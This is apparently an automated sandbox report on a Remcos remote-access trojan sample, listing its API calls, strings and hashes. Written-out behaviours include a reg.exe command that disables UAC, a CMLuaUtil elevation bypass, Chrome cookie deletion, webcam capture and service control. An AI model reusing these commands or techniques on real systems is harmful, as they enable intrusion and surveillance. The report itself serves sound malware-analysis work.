                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-3324213274
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  • UserProfile, xrefs: 0040BAE8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  APIs
                                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                  • API String ID: 2425139147-1584637518
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: 76619ed55c2f0c17be2eaad97e7f72c2334c1b3a82105a28c8bc83252d53aef7
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: 76619ed55c2f0c17be2eaad97e7f72c2334c1b3a82105a28c8bc83252d53aef7
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  Strings
                                                  • SG, xrefs: 00407715
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  • API String ID: 0-1732489412
                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
